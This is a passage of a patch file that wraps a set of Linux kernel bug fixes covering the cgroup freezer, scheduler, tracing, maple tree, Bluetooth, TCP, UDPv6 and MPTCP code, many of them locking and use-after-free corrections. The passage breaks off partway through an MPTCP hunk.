+diff --git a/kernel/cgroup/legacy_freezer.c b/kernel/cgroup/legacy_freezer.c
+index 1b6b21851e9d4..936473203a6b5 100644
+--- a/kernel/cgroup/legacy_freezer.c
++++ b/kernel/cgroup/legacy_freezer.c
+@@ -22,6 +22,7 @@
+ #include <linux/freezer.h>
+ #include <linux/seq_file.h>
+ #include <linux/mutex.h>
++#include <linux/cpu.h>
+ 
+ /*
+  * A cgroup is freezing if any FREEZING flags are set.  FREEZING_SELF is
+@@ -350,7 +351,7 @@ static void freezer_apply_state(struct freezer *freezer, bool freeze,
+ 
+ 	if (freeze) {
+ 		if (!(freezer->state & CGROUP_FREEZING))
+-			static_branch_inc(&freezer_active);
++			static_branch_inc_cpuslocked(&freezer_active);
+ 		freezer->state |= state;
+ 		freeze_cgroup(freezer);
+ 	} else {
+@@ -361,7 +362,7 @@ static void freezer_apply_state(struct freezer *freezer, bool freeze,
+ 		if (!(freezer->state & CGROUP_FREEZING)) {
+ 			freezer->state &= ~CGROUP_FROZEN;
+ 			if (was_freezing)
+-				static_branch_dec(&freezer_active);
++				static_branch_dec_cpuslocked(&freezer_active);
+ 			unfreeze_cgroup(freezer);
+ 		}
+ 	}
+@@ -379,6 +380,7 @@ static void freezer_change_state(struct freezer *freezer, bool freeze)
+ {
+ 	struct cgroup_subsys_state *pos;
+ 
++	cpus_read_lock();
+ 	/*
+ 	 * Update all its descendants in pre-order traversal.  Each
+ 	 * descendant will try to inherit its parent's FREEZING state as
+@@ -407,6 +409,7 @@ static void freezer_change_state(struct freezer *freezer, bool freeze)
+ 	}
+ 	rcu_read_unlock();
+ 	mutex_unlock(&freezer_mutex);
++	cpus_read_unlock();
+ }
+ 
+ static ssize_t freezer_write(struct kernfs_open_file *of,
+diff --git a/kernel/cgroup/rstat.c b/kernel/cgroup/rstat.c
+index 793ecff290385..7006fc8dd6774 100644
+--- a/kernel/cgroup/rstat.c
++++ b/kernel/cgroup/rstat.c
+@@ -457,9 +457,7 @@ static void root_cgroup_cputime(struct cgroup_base_stat *bstat)
+ 	struct task_cputime *cputime = &bstat->cputime;
+ 	int i;
+ 
+-	cputime->stime = 0;
+-	cputime->utime = 0;
+-	cputime->sum_exec_runtime = 0;
++	memset(bstat, 0, sizeof(*bstat));
+ 	for_each_possible_cpu(i) {
+ 		struct kernel_cpustat kcpustat;
+ 		u64 *cpustat = kcpustat.cpustat;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 88821ab009b30..ec2d913280e6a 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -10041,6 +10041,16 @@ static inline void calculate_imbalance(struct lb_env *env, struct sd_lb_stats *s
+ 
+ 		sds->avg_load = (sds->total_load * SCHED_CAPACITY_SCALE) /
+ 				sds->total_capacity;
++
++		/*
++		 * If the local group is more loaded than the average system
++		 * load, don't try to pull any tasks.
++		 */
++		if (local->avg_load >= sds->avg_load) {
++			env->imbalance = 0;
++			return;
++		}
++
+ 	}
+ 
+ 	/*
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 78855e74e355f..3360d638071a1 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1002,13 +1002,8 @@ __buffer_unlock_commit(struct trace_buffer *buffer, struct ring_buffer_event *ev
+ 		ring_buffer_unlock_commit(buffer, event);
+ }
+ 
+-/**
+- * __trace_puts - write a constant string into the trace buffer.
+- * @ip:	   The address of the caller
+- * @str:   The constant string to write
+- * @size:  The size of the string.
+- */
+-int __trace_puts(unsigned long ip, const char *str, int size)
++int __trace_array_puts(struct trace_array *tr, unsigned long ip,
++		       const char *str, int size)
+ {
+ 	struct ring_buffer_event *event;
+ 	struct trace_buffer *buffer;
+@@ -1016,7 +1011,7 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 	unsigned int trace_ctx;
+ 	int alloc;
+ 
+-	if (!(global_trace.trace_flags & TRACE_ITER_PRINTK))
++	if (!(tr->trace_flags & TRACE_ITER_PRINTK))
+ 		return 0;
+ 
+ 	if (unlikely(tracing_selftest_running || tracing_disabled))
+@@ -1025,7 +1020,7 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 	alloc = sizeof(*entry) + size + 2; /* possible \n added */
+ 
+ 	trace_ctx = tracing_gen_ctx();
+-	buffer = global_trace.array_buffer.buffer;
++	buffer = tr->array_buffer.buffer;
+ 	ring_buffer_nest_start(buffer);
+ 	event = __trace_buffer_lock_reserve(buffer, TRACE_PRINT, alloc,
+ 					    trace_ctx);
+@@ -1047,11 +1042,23 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 		entry->buf[size] = '\0';
+ 
+ 	__buffer_unlock_commit(buffer, event);
+-	ftrace_trace_stack(&global_trace, buffer, trace_ctx, 4, NULL);
++	ftrace_trace_stack(tr, buffer, trace_ctx, 4, NULL);
+  out:
+ 	ring_buffer_nest_end(buffer);
+ 	return size;
+ }
++EXPORT_SYMBOL_GPL(__trace_array_puts);
++
++/**
++ * __trace_puts - write a constant string into the trace buffer.
++ * @ip:	   The address of the caller
++ * @str:   The constant string to write
++ * @size:  The size of the string.
++ */
++int __trace_puts(unsigned long ip, const char *str, int size)
++{
++	return __trace_array_puts(&global_trace, ip, str, size);
++}
+ EXPORT_SYMBOL_GPL(__trace_puts);
+ 
+ /**
+@@ -1105,22 +1112,22 @@ static void tracing_snapshot_instance_cond(struct trace_array *tr,
+ 	unsigned long flags;
+ 
+ 	if (in_nmi()) {
+-		internal_trace_puts("*** SNAPSHOT CALLED FROM NMI CONTEXT ***\n");
+-		internal_trace_puts("*** snapshot is being ignored        ***\n");
++		trace_array_puts(tr, "*** SNAPSHOT CALLED FROM NMI CONTEXT ***\n");
++		trace_array_puts(tr, "*** snapshot is being ignored        ***\n");
+ 		return;
+ 	}
+ 
+ 	if (!tr->allocated_snapshot) {
+-		internal_trace_puts("*** SNAPSHOT NOT ALLOCATED ***\n");
+-		internal_trace_puts("*** stopping trace here!   ***\n");
+-		tracing_off();
++		trace_array_puts(tr, "*** SNAPSHOT NOT ALLOCATED ***\n");
++		trace_array_puts(tr, "*** stopping trace here!   ***\n");
++		tracer_tracing_off(tr);
+ 		return;
+ 	}
+ 
+ 	/* Note, snapshot can not be used when the tracer uses it */
+ 	if (tracer->use_max_tr) {
+-		internal_trace_puts("*** LATENCY TRACER ACTIVE ***\n");
+-		internal_trace_puts("*** Can not use snapshot (sorry) ***\n");
++		trace_array_puts(tr, "*** LATENCY TRACER ACTIVE ***\n");
++		trace_array_puts(tr, "*** Can not use snapshot (sorry) ***\n");
+ 		return;
+ 	}
+ 
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 84530fb73bd9e..39f34ea7a9be5 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -178,7 +178,7 @@ static void mt_free_rcu(struct rcu_head *head)
+  */
+ static void ma_free_rcu(struct maple_node *node)
+ {
+-	node->parent = ma_parent_ptr(node);
++	WARN_ON(node->parent != ma_parent_ptr(node));
+ 	call_rcu(&node->rcu, mt_free_rcu);
+ }
+ 
+@@ -1780,8 +1780,10 @@ static inline void mas_replace(struct ma_state *mas, bool advanced)
+ 		rcu_assign_pointer(slots[offset], mas->node);
+ 	}
+ 
+-	if (!advanced)
++	if (!advanced) {
++		mte_set_node_dead(old_enode);
+ 		mas_free(mas, old_enode);
++	}
+ }
+ 
+ /*
+@@ -4216,6 +4218,7 @@ static inline bool mas_wr_node_store(struct ma_wr_state *wr_mas)
+ done:
+ 	mas_leaf_set_meta(mas, newnode, dst_pivots, maple_leaf_64, new_end);
+ 	if (in_rcu) {
++		mte_set_node_dead(mas->node);
+ 		mas->node = mt_mk_node(newnode, wr_mas->type);
+ 		mas_replace(mas, false);
+ 	} else {
+diff --git a/net/9p/trans_xen.c b/net/9p/trans_xen.c
+index 75c03a82baf38..68027e4fb4216 100644
+--- a/net/9p/trans_xen.c
++++ b/net/9p/trans_xen.c
+@@ -278,6 +278,10 @@ static void xen_9pfs_front_free(struct xen_9pfs_front_priv *priv)
+ 	write_unlock(&xen_9pfs_lock);
+ 
+ 	for (i = 0; i < priv->num_rings; i++) {
++		struct xen_9pfs_dataring *ring = &priv->rings[i];
++
++		cancel_work_sync(&ring->work);
++
+ 		if (!priv->rings[i].intf)
+ 			break;
+ 		if (priv->rings[i].irq > 0)
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 09e7f841f149d..c2c6dea01cc91 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -68,7 +68,7 @@ static const struct sco_param esco_param_msbc[] = {
+ };
+ 
+ /* This function requires the caller holds hdev->lock */
+-static void hci_connect_le_scan_cleanup(struct hci_conn *conn)
++static void hci_connect_le_scan_cleanup(struct hci_conn *conn, u8 status)
+ {
+ 	struct hci_conn_params *params;
+ 	struct hci_dev *hdev = conn->hdev;
+@@ -88,9 +88,28 @@ static void hci_connect_le_scan_cleanup(struct hci_conn *conn)
+ 
+ 	params = hci_pend_le_action_lookup(&hdev->pend_le_conns, bdaddr,
+ 					   bdaddr_type);
+-	if (!params || !params->explicit_connect)
++	if (!params)
+ 		return;
+ 
++	if (params->conn) {
++		hci_conn_drop(params->conn);
++		hci_conn_put(params->conn);
++		params->conn = NULL;
++	}
++
++	if (!params->explicit_connect)
++		return;
++
++	/* If the status indicates successful cancellation of
++	 * the attempt (i.e. Unknown Connection Id) there's no point of
++	 * notifying failure since we'll go back to keep trying to
++	 * connect. The only exception is explicit connect requests
++	 * where a timeout + cancel does indicate an actual failure.
++	 */
++	if (status && status != HCI_ERROR_UNKNOWN_CONN_ID)
++		mgmt_connect_failed(hdev, &conn->dst, conn->type,
++				    conn->dst_type, status);
++
+ 	/* The connection attempt was doing scan for new RPA, and is
+ 	 * in scan phase. If params are not associated with any other
+ 	 * autoconnect action, remove them completely. If they are, just unmark
+@@ -178,7 +197,7 @@ static void le_scan_cleanup(struct work_struct *work)
+ 	rcu_read_unlock();
+ 
+ 	if (c == conn) {
+-		hci_connect_le_scan_cleanup(conn);
++		hci_connect_le_scan_cleanup(conn, 0x00);
+ 		hci_conn_cleanup(conn);
+ 	}
+ 
+@@ -1051,6 +1070,17 @@ struct hci_conn *hci_conn_add(struct hci_dev *hdev, int type, bdaddr_t *dst,
+ 	return conn;
+ }
+ 
++static bool hci_conn_unlink(struct hci_conn *conn)
++{
++	if (!conn->link)
++		return false;
++
++	conn->link->link = NULL;
++	conn->link = NULL;
++
++	return true;
++}
++
+ int hci_conn_del(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+@@ -1062,9 +1092,17 @@ int hci_conn_del(struct hci_conn *conn)
+ 	cancel_delayed_work_sync(&conn->idle_work);
+ 
+ 	if (conn->type == ACL_LINK) {
+-		struct hci_conn *sco = conn->link;
+-		if (sco)
+-			sco->link = NULL;
++		struct hci_conn *link = conn->link;
++
++		if (link) {
++			hci_conn_unlink(conn);
++			/* Due to race, SCO connection might be not established
++			 * yet at this point. Delete it now, otherwise it is
++			 * possible for it to be stuck and can't be deleted.
++			 */
++			if (link->handle == HCI_CONN_HANDLE_UNSET)
++				hci_conn_del(link);
++		}
+ 
+ 		/* Unacked frames */
+ 		hdev->acl_cnt += conn->sent;
+@@ -1079,7 +1117,7 @@ int hci_conn_del(struct hci_conn *conn)
+ 		struct hci_conn *acl = conn->link;
+ 
+ 		if (acl) {
+-			acl->link = NULL;
++			hci_conn_unlink(conn);
+ 			hci_conn_drop(acl);
+ 		}
+ 
+@@ -1174,31 +1212,8 @@ EXPORT_SYMBOL(hci_get_route);
+ static void hci_le_conn_failed(struct hci_conn *conn, u8 status)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+-	struct hci_conn_params *params;
+-
+-	params = hci_pend_le_action_lookup(&hdev->pend_le_conns, &conn->dst,
+-					   conn->dst_type);
+-	if (params && params->conn) {
+-		hci_conn_drop(params->conn);
+-		hci_conn_put(params->conn);
+-		params->conn = NULL;
+-	}
+-
+-	/* If the status indicates successful cancellation of
+-	 * the attempt (i.e. Unknown Connection Id) there's no point of
+-	 * notifying failure since we'll go back to keep trying to
+-	 * connect. The only exception is explicit connect requests
+-	 * where a timeout + cancel does indicate an actual failure.
+-	 */
+-	if (status != HCI_ERROR_UNKNOWN_CONN_ID ||
+-	    (params && params->explicit_connect))
+-		mgmt_connect_failed(hdev, &conn->dst, conn->type,
+-				    conn->dst_type, status);
+ 
+-	/* Since we may have temporarily stopped the background scanning in
+-	 * favor of connection establishment, we should restart it.
+-	 */
+-	hci_update_passive_scan(hdev);
++	hci_connect_le_scan_cleanup(conn, status);
+ 
+ 	/* Enable advertising in case this was a failed connection
+ 	 * attempt as a peripheral.
+@@ -1232,15 +1247,15 @@ static void create_le_conn_complete(struct hci_dev *hdev, void *data, int err)
+ {
+ 	struct hci_conn *conn = data;
+ 
++	bt_dev_dbg(hdev, "err %d", err);
++
+ 	hci_dev_lock(hdev);
+ 
+ 	if (!err) {
+-		hci_connect_le_scan_cleanup(conn);
++		hci_connect_le_scan_cleanup(conn, 0x00);
+ 		goto done;
+ 	}
+ 
+-	bt_dev_err(hdev, "request failed to create LE connection: err %d", err);
+-
+ 	/* Check if connection is still pending */
+ 	if (conn != hci_lookup_le_connect(hdev))
+ 		goto done;
+@@ -2438,6 +2453,12 @@ void hci_conn_hash_flush(struct hci_dev *hdev)
+ 		c->state = BT_CLOSED;
+ 
+ 		hci_disconn_cfm(c, HCI_ERROR_LOCAL_HOST_TERM);
++
++		/* Unlink before deleting otherwise it is possible that
++		 * hci_conn_del removes the link which may cause the list to
++		 * contain items already freed.
++		 */
++		hci_conn_unlink(c);
+ 		hci_conn_del(c);
+ 	}
+ }
+@@ -2775,6 +2796,9 @@ int hci_abort_conn(struct hci_conn *conn, u8 reason)
+ {
+ 	int r = 0;
+ 
++	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++		return 0;
++
+ 	switch (conn->state) {
+ 	case BT_CONNECTED:
+ 	case BT_CONFIG:
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 0e2425eb6aa79..42a3a19b111e3 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -2876,16 +2876,6 @@ static void cs_le_create_conn(struct hci_dev *hdev, bdaddr_t *peer_addr,
+ 
+ 	conn->resp_addr_type = peer_addr_type;
+ 	bacpy(&conn->resp_addr, peer_addr);
+-
+-	/* We don't want the connection attempt to stick around
+-	 * indefinitely since LE doesn't have a page timeout concept
+-	 * like BR/EDR. Set a timer for any connection that doesn't use
+-	 * the accept list for connecting.
+-	 */
+-	if (filter_policy == HCI_LE_USE_PEER_ADDR)
+-		queue_delayed_work(conn->hdev->workqueue,
+-				   &conn->le_conn_timeout,
+-				   conn->conn_timeout);
+ }
+ 
+ static void hci_cs_le_create_conn(struct hci_dev *hdev, u8 status)
+@@ -5892,6 +5882,12 @@ static void le_conn_complete_evt(struct hci_dev *hdev, u8 status,
+ 	if (status)
+ 		goto unlock;
+ 
++	/* Drop the connection if it has been aborted */
++	if (test_bit(HCI_CONN_CANCEL, &conn->flags)) {
++		hci_conn_drop(conn);
++		goto unlock;
++	}
++
+ 	if (conn->dst_type == ADDR_LE_DEV_PUBLIC)
+ 		addr_type = BDADDR_LE_PUBLIC;
+ 	else
+@@ -6985,7 +6981,7 @@ static void hci_le_big_sync_established_evt(struct hci_dev *hdev, void *data,
+ 		bis->iso_qos.in.latency = le16_to_cpu(ev->interval) * 125 / 100;
+ 		bis->iso_qos.in.sdu = le16_to_cpu(ev->max_pdu);
+ 
+-		hci_connect_cfm(bis, ev->status);
++		hci_iso_setup_path(bis);
+ 	}
+ 
+ 	hci_dev_unlock(hdev);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index f614f96c5c23d..9361fb3685cc7 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -246,8 +246,9 @@ int __hci_cmd_sync_status_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 
+ 	skb = __hci_cmd_sync_sk(hdev, opcode, plen, param, event, timeout, sk);
+ 	if (IS_ERR(skb)) {
+-		bt_dev_err(hdev, "Opcode 0x%4x failed: %ld", opcode,
+-				PTR_ERR(skb));
++		if (!event)
++			bt_dev_err(hdev, "Opcode 0x%4x failed: %ld", opcode,
++				   PTR_ERR(skb));
+ 		return PTR_ERR(skb);
+ 	}
+ 
+@@ -5108,8 +5109,11 @@ static int hci_le_connect_cancel_sync(struct hci_dev *hdev,
+ 	if (test_bit(HCI_CONN_SCANNING, &conn->flags))
+ 		return 0;
+ 
++	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++		return 0;
++
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_LE_CREATE_CONN_CANCEL,
+-				     6, &conn->dst, HCI_CMD_TIMEOUT);
++				     0, NULL, HCI_CMD_TIMEOUT);
+ }
+ 
+ static int hci_connect_cancel_sync(struct hci_dev *hdev, struct hci_conn *conn)
+@@ -6084,6 +6088,9 @@ int hci_le_create_conn_sync(struct hci_dev *hdev, struct hci_conn *conn)
+ 				       conn->conn_timeout, NULL);
+ 
+ done:
++	if (err == -ETIMEDOUT)
++		hci_le_connect_cancel_sync(hdev, conn);
++
+ 	/* Re-enable advertising after the connection attempt is finished. */
+ 	hci_resume_advertising_sync(hdev);
+ 	return err;
+diff --git a/net/bluetooth/hidp/core.c b/net/bluetooth/hidp/core.c
+index cc20e706c6391..82cc15ad963d8 100644
+--- a/net/bluetooth/hidp/core.c
++++ b/net/bluetooth/hidp/core.c
+@@ -433,7 +433,7 @@ static void hidp_set_timer(struct hidp_session *session)
+ static void hidp_del_timer(struct hidp_session *session)
+ {
+ 	if (session->idle_to > 0)
+-		del_timer(&session->timer);
++		del_timer_sync(&session->timer);
+ }
+ 
+ static void hidp_process_report(struct hidp_session *session, int type,
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index b6f69d1feeeec..e62dadad81b31 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -4652,33 +4652,27 @@ static inline int l2cap_disconnect_req(struct l2cap_conn *conn,
+ 
+ 	BT_DBG("scid 0x%4.4x dcid 0x%4.4x", scid, dcid);
+ 
+-	mutex_lock(&conn->chan_lock);
+-
+-	chan = __l2cap_get_chan_by_scid(conn, dcid);
++	chan = l2cap_get_chan_by_scid(conn, dcid);
+ 	if (!chan) {
+-		mutex_unlock(&conn->chan_lock);
+ 		cmd_reject_invalid_cid(conn, cmd->ident, dcid, scid);
+ 		return 0;
+ 	}
+ 
+-	l2cap_chan_hold(chan);
+-	l2cap_chan_lock(chan);
+-
+ 	rsp.dcid = cpu_to_le16(chan->scid);
+ 	rsp.scid = cpu_to_le16(chan->dcid);
+ 	l2cap_send_cmd(conn, cmd->ident, L2CAP_DISCONN_RSP, sizeof(rsp), &rsp);
+ 
+ 	chan->ops->set_shutdown(chan);
+ 
++	mutex_lock(&conn->chan_lock);
+ 	l2cap_chan_del(chan, ECONNRESET);
++	mutex_unlock(&conn->chan_lock);
+ 
+ 	chan->ops->close(chan);
+ 
+ 	l2cap_chan_unlock(chan);
+ 	l2cap_chan_put(chan);
+ 
+-	mutex_unlock(&conn->chan_lock);
+-
+ 	return 0;
+ }
+ 
+@@ -4698,33 +4692,27 @@ static inline int l2cap_disconnect_rsp(struct l2cap_conn *conn,
+ 
+ 	BT_DBG("dcid 0x%4.4x scid 0x%4.4x", dcid, scid);
+ 
+-	mutex_lock(&conn->chan_lock);
+-
+-	chan = __l2cap_get_chan_by_scid(conn, scid);
++	chan = l2cap_get_chan_by_scid(conn, scid);
+ 	if (!chan) {
+ 		mutex_unlock(&conn->chan_lock);
+ 		return 0;
+ 	}
+ 
+-	l2cap_chan_hold(chan);
+-	l2cap_chan_lock(chan);
+-
+ 	if (chan->state != BT_DISCONN) {
+ 		l2cap_chan_unlock(chan);
+ 		l2cap_chan_put(chan);
+-		mutex_unlock(&conn->chan_lock);
+ 		return 0;
+ 	}
+ 
++	mutex_lock(&conn->chan_lock);
+ 	l2cap_chan_del(chan, 0);
++	mutex_unlock(&conn->chan_lock);
+ 
+ 	chan->ops->close(chan);
+ 
+ 	l2cap_chan_unlock(chan);
+ 	l2cap_chan_put(chan);
+ 
+-	mutex_unlock(&conn->chan_lock);
+-
+ 	return 0;
+ }
+ 
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 1111da4e2f2bd..1755f91a66f6a 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -1129,6 +1129,8 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
++		release_sock(sk);
++
+ 		/* find total buffer size required to copy codec + caps */
+ 		hci_dev_lock(hdev);
+ 		list_for_each_entry(c, &hdev->local_codecs, list) {
+@@ -1146,15 +1148,13 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 		buf_len += sizeof(struct bt_codecs);
+ 		if (buf_len > len) {
+ 			hci_dev_put(hdev);
+-			err = -ENOBUFS;
+-			break;
++			return -ENOBUFS;
+ 		}
+ 		ptr = optval;
+ 
+ 		if (put_user(num_codecs, ptr)) {
+ 			hci_dev_put(hdev);
+-			err = -EFAULT;
+-			break;
++			return -EFAULT;
+ 		}
+ 		ptr += sizeof(num_codecs);
+ 
+@@ -1194,12 +1194,14 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 			ptr += len;
+ 		}
+ 
+-		if (!err && put_user(buf_len, optlen))
+-			err = -EFAULT;
+-
+ 		hci_dev_unlock(hdev);
+ 		hci_dev_put(hdev);
+ 
++		lock_sock(sk);
++
++		if (!err && put_user(buf_len, optlen))
++			err = -EFAULT;
++
+ 		break;
+ 
+ 	default:
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 24eae99dfe05a..a25b8741b1599 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3211,6 +3211,7 @@ static u16 skb_tx_hash(const struct net_device *dev,
+ 	}
+ 
+ 	if (skb_rx_queue_recorded(skb)) {
++		DEBUG_NET_WARN_ON_ONCE(qcount == 0);
+ 		hash = skb_get_rx_queue(skb);
+ 		if (hash >= qoffset)
+ 			hash -= qoffset;
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 51db260f471f4..cd4b3a610961f 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -5409,18 +5409,18 @@ bool skb_try_coalesce(struct sk_buff *to, struct sk_buff *from,
+ 	if (skb_cloned(to))
+ 		return false;
+ 
+-	/* In general, avoid mixing slab allocated and page_pool allocated
+-	 * pages within the same SKB. However when @to is not pp_recycle and
+-	 * @from is cloned, we can transition frag pages from page_pool to
+-	 * reference counted.
+-	 *
+-	 * On the other hand, don't allow coalescing two pp_recycle SKBs if
+-	 * @from is cloned, in case the SKB is using page_pool fragment
++	/* In general, avoid mixing page_pool and non-page_pool allocated
++	 * pages within the same SKB. Additionally avoid dealing with clones
++	 * with page_pool pages, in case the SKB is using page_pool fragment
+ 	 * references (PP_FLAG_PAGE_FRAG). Since we only take full page
+ 	 * references for cloned SKBs at the moment that would result in
+ 	 * inconsistent reference counts.
++	 * In theory we could take full references if @from is cloned and
++	 * !@to->pp_recycle but its tricky (due to potential race with
++	 * the clone disappearing) and rare, so not worth dealing with.
+ 	 */
+-	if (to->pp_recycle != (from->pp_recycle && !skb_cloned(from)))
++	if (to->pp_recycle != from->pp_recycle ||
++	    (from->pp_recycle && skb_cloned(from)))
+ 		return false;
+ 
+ 	if (len <= skb_tailroom(to)) {
+diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c
+index 9b8a6db7a66b3..39dbeb6071965 100644
+--- a/net/ipv4/sysctl_net_ipv4.c
++++ b/net/ipv4/sysctl_net_ipv4.c
+@@ -25,6 +25,7 @@ static int ip_local_port_range_min[] = { 1, 1 };
+ static int ip_local_port_range_max[] = { 65535, 65535 };
+ static int tcp_adv_win_scale_min = -31;
+ static int tcp_adv_win_scale_max = 31;
++static int tcp_app_win_max = 31;
+ static int tcp_min_snd_mss_min = TCP_MIN_SND_MSS;
+ static int tcp_min_snd_mss_max = 65535;
+ static int ip_privileged_port_min;
+@@ -1171,6 +1172,8 @@ static struct ctl_table ipv4_net_table[] = {
+ 		.maxlen		= sizeof(u8),
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dou8vec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= &tcp_app_win_max,
+ 	},
+ 	{
+ 		.procname	= "tcp_adv_win_scale",
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index da46357f501b3..ad0a5f185a694 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -2728,7 +2728,7 @@ static int tcp_prog_seq_show(struct bpf_prog *prog, struct bpf_iter_meta *meta,
+ static void bpf_iter_tcp_put_batch(struct bpf_tcp_iter_state *iter)
+ {
+ 	while (iter->cur_sk < iter->end_sk)
+-		sock_put(iter->batch[iter->cur_sk++]);
++		sock_gen_put(iter->batch[iter->cur_sk++]);
+ }
+ 
+ static int bpf_iter_tcp_realloc_batch(struct bpf_tcp_iter_state *iter,
+@@ -2889,7 +2889,7 @@ static void *bpf_iter_tcp_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ 		 * st->bucket.  See tcp_seek_last_pos().
+ 		 */
+ 		st->offset++;
+-		sock_put(iter->batch[iter->cur_sk++]);
++		sock_gen_put(iter->batch[iter->cur_sk++]);
+ 	}
+ 
+ 	if (iter->cur_sk < iter->end_sk)
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 98a64e8d9bdaa..17d721a6add72 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1391,9 +1391,11 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 			msg->msg_name = &sin;
+ 			msg->msg_namelen = sizeof(sin);
+ do_udp_sendmsg:
+-			if (ipv6_only_sock(sk))
+-				return -ENETUNREACH;
+-			return udp_sendmsg(sk, msg, len);
++			err = ipv6_only_sock(sk) ?
++				-ENETUNREACH : udp_sendmsg(sk, msg, len);
++			msg->msg_name = sin6;
++			msg->msg_namelen = addr_len;
++			return err;
+ 		}
+ 	}
+ 
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index 30d289044e71b..6b2ef3bb53a3d 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -1183,9 +1183,8 @@ bool mptcp_incoming_options(struct sock *sk, struct sk_buff *skb)
+ 	 */
+ 	if (TCP_SKB_CB(skb)->seq == TCP_SKB_CB(skb)->end_seq) {
+ 		if (mp_opt.data_fin && mp_opt.data_len == 1 &&
+-		    mptcp_update_rcv_data_fin(msk, mp_opt.data_seq, mp_opt.dsn64) &&
+-		    schedule_work(&msk->work))
+-			sock_hold(subflow->conn);
++		    mptcp_update_rcv_data_fin(msk, mp_opt.data_seq, mp_opt.dsn64))
++			mptcp_schedule_work((struct sock *)msk);
+ 
+ 		return true;
+ 	}
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index f0cde2d7233dc..19f35869a164a 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2638,7 +2638,7 @@ static void mptcp_worker(struct work_struct *work)
+ 
+ 	lock_sock(sk);
+ 	state = sk->sk_state;
+-	if (unlikely(state == TCP_CLOSE))
++	if (unlikely((1 << state) & (TCPF_CLOSE | TCPF_LISTEN)))
+ 		goto unlock;
+ 
+ 	mptcp_check_data_fin_ack(sk);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index fc876c2480029..125d1f58d6a43 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -366,9 +366,8 @@ void mptcp_subflow_reset(struct sock *ssk)
+ 
+ 	tcp_send_active_reset(ssk, GFP_ATOMIC);
+ 	tcp_done(ssk);
+-	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags) &&
+-	    schedule_work(&mptcp_sk(sk)->work))
+-		return; /* worker will put sk for us */
++	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags))
++		mptcp_schedule_work(sk);
+ 
+ 	sock_put(sk);
+ }
+@@ -1054,8 +1053,8 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 				skb_ext_del(skb, SKB_EXT_MPTCP);
+ 				return MAPPING_OK;
+ 			} else {
+-				if (updated && schedule_work(&msk->work))
+-					sock_hold((struct sock *)msk);
++				if (updated)
++					mptcp_schedule_work((struct sock *)msk);
+ 
+ 				return MAPPING_DATA_FIN;
+ 			}
+@@ -1158,17 +1157,12 @@ static void mptcp_subflow_discard_data(struct sock *ssk, struct sk_buff *skb,
+ /* sched mptcp worker to remove the subflow if no more data is pending */
+ static void subflow_sched_work_if_closed(struct mptcp_sock *msk, struct sock *ssk)
+ {
+-	struct sock *sk = (struct sock *)msk;
+-
+ 	if (likely(ssk->sk_state != TCP_CLOSE))
+ 		return;
+ 
+ 	if (skb_queue_empty(&ssk->sk_receive_queue) &&
+-	    !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags)) {
+-		sock_hold(sk);
+-		if (!schedule_work(&msk->work))
+-			sock_put(sk);
+-	}
